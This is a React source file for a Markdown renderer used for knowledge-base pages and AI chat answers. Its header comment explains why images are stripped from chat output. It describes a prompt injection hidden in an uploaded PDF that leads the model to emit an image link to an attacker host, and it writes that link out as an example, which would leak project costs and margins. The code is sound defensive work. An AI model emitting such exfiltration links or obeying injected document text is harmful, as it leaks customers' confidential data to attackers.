/**
 * Markdown.tsx — safe Markdown renderer (react-markdown + GFM) for the KB
 * reading view (`page`) and chat answers (`chat`). Typography lives in
 * index.css (`.md` / `.md-chat`). No raw HTML is rendered (react-markdown
 * escapes by default), so untrusted page/answer text is safe to display.
 */
import ReactMarkdown from "react-markdown";
import remarkGfm from "remark-gfm";

/**
 * Images are not rendered in CHAT answers.
 *
 * A model answer is derived from customer-uploaded documents, so its text is
 * only as trustworthy as those documents. `![](https://attacker/?q=…)` renders
 * as a live `<img src>` that fires on sight, and the app ships no
 * Content-Security-Policy — which turns a prompt injection hidden in an
 * uploaded PDF into a working way to send that project's costs and margins to
 * an arbitrary host. Chat answers are text and tables by specification, so
 * nothing legitimate is lost. The `page` variant renders wiki pages the tenant
 * authored and keeps images.
 */
const CHAT_DISALLOWED = ["img"];

export function Markdown({
  children,
  variant = "page",
}: {
  children: string;
  variant?: "page" | "chat";
}): JSX.Element {
  return (
    <div className={variant === "chat" ? "md md-chat" : "md"}>
      <ReactMarkdown
        remarkPlugins={[remarkGfm]}
        disallowedElements={variant === "chat" ? CHAT_DISALLOWED : undefined}
        unwrapDisallowed
      >
        {children}
      </ReactMarkdown>
    </div>
  );
}
